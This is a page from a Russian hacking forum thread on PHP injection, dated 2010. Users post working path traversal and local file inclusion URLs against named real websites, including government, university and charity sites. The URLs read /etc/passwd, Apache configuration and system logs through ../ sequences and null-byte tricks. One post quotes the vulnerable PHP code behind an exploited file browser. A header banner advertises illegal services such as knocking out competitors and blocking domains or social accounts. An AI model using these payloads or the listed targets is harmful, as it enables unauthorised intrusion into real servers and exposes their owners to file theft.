УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 122 из 143

122

Опции темы

Поиск в этой теме

Опции просмотра

#1211

13.10.2010, 19:48

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

http://www.pogpet.am/sis/index.php?page=/var/log/dmesg

#1212

22.10.2010, 20:27

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

http://metanohi.org/browse/no-js.php?u=../../../etc/passwd

с лева читалка всех файлов..

уязвимый код: browse/no-js.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]getraw[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]= array();

  

  function[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]) {

    global[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];

    while ([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]current[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]key[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];

          

      if ([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])] =[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

        

        if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]);

        

[/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]];

        if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$spath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];

          if ([/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]]) >[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"];

          foreach ([/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$spath[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];

            if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]'~'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

          }

        }

[/COLOR][COLOR="#0000BB"]array_splice[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

        

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

      }

[/COLOR][COLOR="#0000BB"]next[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]);

    }

  }

  

[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lr[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"];

  foreach ([/COLOR][COLOR="#0000BB"]$lr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) {

    if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]'~'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

  }

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'u'[/COLOR][COLOR="#007700"]];

if (![/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'vijuv'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$namet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$nametp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"];

}

else {

[/COLOR][COLOR="#0000BB"]$namet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$nametp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../:[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]= include([/COLOR][COLOR="#DD0000"]'get.php'[/COLOR][COLOR="#007700"]);

if (![/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Click on a filename in the left pane to show the content of that file.'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR]

#1213

25.10.2010, 19:50

valyka80

Новичок

Регистрация: 14.06.2010

Сообщений: 0

Провел на форуме:
930

Репутация: 0

http://townofryeny.gov:80/index.php?act=downloads&file_name=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

#1214

29.10.2010, 22:36

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

http://www.sexpistolsofficial.com/index.php?module=../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

#1215

30.10.2010, 09:52

Unknown

Guest

Сообщений: n/a

Провел на форуме:
51225

Репутация: 23

http://www.aroundthecapitol.com/code/getcode.html?file=../../../../../etc/passwd

#1216

30.10.2010, 16:08

<Cyber-punk>

Участник форума

Регистрация: 01.10.2009

Сообщений: 105

Провел на форуме:
559542

Репутация: 94

Отправить сообщение для <Cyber-punk> с помощью ICQ

Довесочек:

Цитата:

Сообщение от None

http://www.cieloenterprises.com/opmagazine/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://antiguadaily.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.carvercobras.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

И PR-6

Цитата:

Сообщение от None

http://www.yfg.ie/index.php?template=system&option=com_jesubmit&view =../../../../../../../../../../../../../etc/passwd%00

#1217

02.11.2010, 13:48

daniel_1024

Участник форума

Регистрация: 15.07.2009

Сообщений: 158

Провел на форуме:
698831

Репутация: 34

http://otl.pomona.edu/main.php?p=../../../../../../etc/passwd%00

#1218

08.11.2010, 23:07

Bramin

Участник форума

Регистрация: 15.05.2009

Сообщений: 111

Провел на форуме:
1179199

Репутация: 127

Отправить сообщение для Bramin с помощью ICQ

http://integ625.rsjp.net/file.php?id=../../../../../../../../etc/passwd

http://www.technicalfacilitation.com/get.php?link=../../../../../etc/passwd%00

#1219

11.11.2010, 16:47

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

http://www.wa-mongols.org/site/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00&Itemid=4

http://www.protectedchildren.org/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00&Itemid=58

#1220

13.11.2010, 19:20

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

http://www.arborbooks.com/index.php?id=index.php

Страница 122 из 143

122

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход